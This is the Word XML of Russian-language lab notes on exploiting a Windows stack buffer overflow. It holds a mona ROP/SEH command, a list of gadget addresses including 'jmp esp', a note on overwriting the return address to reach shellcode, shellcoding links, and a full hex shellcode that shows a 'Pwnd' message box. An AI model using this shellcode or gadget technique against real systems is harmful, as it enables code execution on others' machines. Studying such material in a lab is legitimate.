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B85C5" w14:textId="31533045" w:rsidR="00965ACE" w:rsidRDefault="002E5034">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="137BFD9D" wp14:editId="6B766FDC">
            <wp:extent cx="5940425" cy="196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9763" w14:textId="570FA660" w:rsidR="00A131A8" w:rsidRDefault="00A131A8"/>
    <w:p w14:paraId="0E6EA2EB" w14:textId="36F68440" w:rsidR="00A131A8" w:rsidRDefault="00A131A8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5778424F" wp14:editId="492650FA">
            <wp:extent cx="5940425" cy="1527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DD84B" wp14:editId="0AB0AD56">
            <wp:extent cx="5940425" cy="2078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5415" w14:textId="5E101EB6" w:rsidR="00A131A8" w:rsidRDefault="00A131A8"/>
    <w:p w14:paraId="2B771B8A" w14:textId="71586D17" w:rsidR="00A131A8" w:rsidRDefault="00A131A8">
      <w:r>
        <w:t>А также</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685E0A22" w14:textId="4F380B40" w:rsidR="00A131A8" w:rsidRDefault="00A131A8">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A131A8">
        <w:t>!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A131A8">
        <w:t>mona</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A131A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A131A8">
        <w:t>rop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A131A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A131A8">
        <w:t>ropfunc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A131A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A131A8">
        <w:t>seh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="341468D2" w14:textId="3F9D76FA" w:rsidR="00A131A8" w:rsidRDefault="00A131A8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="439E5FC0" wp14:editId="20845E1A">
            <wp:extent cx="5940425" cy="1993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2C31" w14:textId="30ADFF56" w:rsidR="00397BAD" w:rsidRDefault="00397BAD"/>
    <w:p w14:paraId="7C82105C" w14:textId="5E1E9C8C" w:rsidR="00397BAD" w:rsidRDefault="00397BAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="252526"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F5367A9" wp14:editId="62CF8241">
            <wp:extent cx="5939504" cy="8382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4713" b="4951"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="83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4057C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  <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Адрес</w:t>
      </w:r>
      <w:r w:rsidRPr="00397BAD">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>Инструкция</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE30957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0x62501026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call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</w:p>
    <w:p w14:paraId="12EA174B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0x62501057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98C43B5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0x625010E8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call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</w:p>
    <w:p w14:paraId="550E37B7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0x6250116C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1D7C53D4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0x62501192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45A8B884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0x6250122C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74BB8B3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0x62501271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9D9F449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0x62501293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197D6CD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0x62501297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7BC613A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0x62501299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</w:p>
    <w:p w14:paraId="78EDD94B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0x6250129C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pop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; </w:t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7B5FF6A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0x6250129D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7C14785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0x6250129F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85ABFC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0x625012A3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0C7D463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0x625012A9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CFC4410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0x625012AB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4CBF29B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0x625012AF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0F26E127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0x625012B1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ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61985B8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0x625012B5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2CFC130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0x625012B7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D72A3D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0x625012BB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120581EC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0x625012C1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78560163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0x625012C3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16803E2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0x625012C7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50DE576E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0x625012C9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edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7CCD064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0x625012CD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6077B507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0x625012CF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6B68AD8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0x625012D3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29D5E1AC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0x625012D8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pop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; </w:t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0D3F3DDB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0x625012D9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4E34C124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0x625012DB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8E25FF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0x625012DF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7F88510E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0x625012E5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2B9A8D7C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0x625012E7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63328A3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0x625012EB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24ED345A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0x625012ED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jmp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esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3AFE2867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0x625012F5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4360CAB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0x625012F7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734E8DE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0x62501317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27A69735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0x62501331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D03A06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0x62501364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4F2D4238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0x62501384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16523E08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0x625013A4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6C226AA8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0x625013D0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call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</w:p>
    <w:p w14:paraId="7F62A03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0x625013EB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05AA7C6A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0x62501422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787394CB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0x62501428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052028FC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0x6250144B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DD0FB20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0x62501502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call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</w:p>
    <w:p w14:paraId="153EE194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0x62501505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2860B44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0x62501542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20F09C2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0x62501593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call</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00397BAD">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00397BAD">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49A42D69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0x625015B1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A6EDE6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0x625015DB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4A57C7C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0x625015F7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2498D2E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0x62501639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15DF89B7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0x62501669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BB2E1E2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0x625016B5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89081FA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0x62501714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AD73CB8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0x6250175C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6E414412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0x625017EB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8DD4F96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0x62501830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D4320CF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0x625018AA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534E6D94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0x625018D9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02CEB271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lastRenderedPageBreak/>
        <w:t>0x62501949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4EA04D33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0x625019B9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76BE878D" w14:textId="77777777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0x625019E5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6A23EE2B" w14:textId="06631DE5" w:rsidR="00397BAD" w:rsidRPr="00397BAD" w:rsidRDefault="00397BAD" w:rsidP="00397BAD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397BAD">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x62501B88</w:t>
      </w:r>
      <w:r w:rsidRPr="00397BAD">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00397BAD">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F22C709" w14:textId="77777777" w:rsidR="00397BAD" w:rsidRPr="00397BAD" w:rsidRDefault="00397BAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="252526"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E294E2D" w14:textId="245F7116" w:rsidR="00397BAD" w:rsidRDefault="00397BAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="252526"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="252526"/>
        </w:rPr>
        <w:t>Для переполнения буфера вам нужно создать полезную нагрузку, которая будет переполнять буфер и перезаписывать адрес возврата. Адрес возврата должен быть изменен на адрес, где находится ваш шелл-код</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A0D3BE" w14:textId="5B418EB6" w:rsidR="00397BAD" w:rsidRDefault="00397BAD"/>
    <w:p w14:paraId="7D0CC2FE" w14:textId="58DD292A" w:rsidR="007F73C7" w:rsidRDefault="007F73C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53FFA751" wp14:editId="05BDAE87">
            <wp:extent cx="5746994" cy="1003190"/>
            <wp:effectExtent l="0" t="0" r="635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945" cy="10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0BF9" w14:textId="66524E2C" w:rsidR="007F73C7" w:rsidRDefault="00F86035">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="003302FC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://stackoverflow.com/questions/29790175/assembly-x86-leave-instruction</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A56E8F1" w14:textId="54165B52" w:rsidR="00F86035" w:rsidRDefault="00F86035"/>
    <w:p w14:paraId="78BA297C" w14:textId="45FC66CB" w:rsidR="00F86035" w:rsidRDefault="00B93B50">
      <w:r w:rsidRPr="00B93B50">
        <w:t>https://blackcloud.me/Win32-shellcode-3/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F7B39F" w14:textId="7F005B60" w:rsidR="00F86035" w:rsidRDefault="00F86035">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F7BE080" wp14:editId="5E607261">
            <wp:extent cx="1790700" cy="1762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65B7" w14:textId="5962D0B2" w:rsidR="00B93B50" w:rsidRDefault="00B93B50">
      <w:r w:rsidRPr="00B93B50">
        <w:t>https://github.com/NoviceLive/shellcoding/blob/master/windows/messagebox/messagebox32.asm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5624625C" w14:textId="753E03AD" w:rsidR="00B93B50" w:rsidRPr="00CD5DB3" w:rsidRDefault="00B93B50">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">134 </w:t>
      </w:r>
      <w:r>
        <w:t>строчка</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C41525" w14:textId="77777777" w:rsidR="00F86035" w:rsidRPr="00F86035" w:rsidRDefault="00F86035" w:rsidP="00F860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860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shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00F860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860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F860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8603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x31\xc9\xf7\xe1\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x89\xd5\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x68\x6c\x6c\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x33\x32\x2e\x64\x68\x55\x73\x65\x72\x54\xff\xd0\x68\x6f\x78\x41\x61\x66\x83\x6c\x24\x03\x61\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd5\x83\xc4\x10\x31\xd2\x31\xc9\x52\x68\x50\x77\x6e\x64\x89\xe7\x52\xFF\x35\x00\x00\x00\x00\xFF\x35\x00\x00\x00\x00\xFF\x35\x00\x00\x00\x00\x89\xe1\x52\x57\x51\x52\xff\xd0\x83\xc4\x10\x68\x65\x73\x73\x61\x66\x83\x6c\x24\x03\x61\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x53\xff\xd5\x31\xc9\x51\xff\xd0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F860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1532188" w14:textId="77777777" w:rsidR="00F86035" w:rsidRPr="00B93B50" w:rsidRDefault="00F86035">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F86035" w:rsidRPr="00B93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A5"/>
    <w:rsid w:val="00142F57"/>
    <w:rsid w:val="00183A2E"/>
    <w:rsid w:val="00290205"/>
    <w:rsid w:val="002E5034"/>
    <w:rsid w:val="00397BAD"/>
    <w:rsid w:val="007F73C7"/>
    <w:rsid w:val="009537A5"/>
    <w:rsid w:val="00965ACE"/>
    <w:rsid w:val="00A131A8"/>
    <w:rsid w:val="00A758A5"/>
    <w:rsid w:val="00B93B50"/>
    <w:rsid w:val="00CD5DB3"/>
    <w:rsid w:val="00F8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0AEE2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F2A7635F-6692-4C2D-A6C5-2BB955A6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603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86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stackoverflow.com/questions/29790175/assembly-x86-leave-instruc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2144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 Черникова</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Василиса Черникова</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-01T09:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-03T21:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>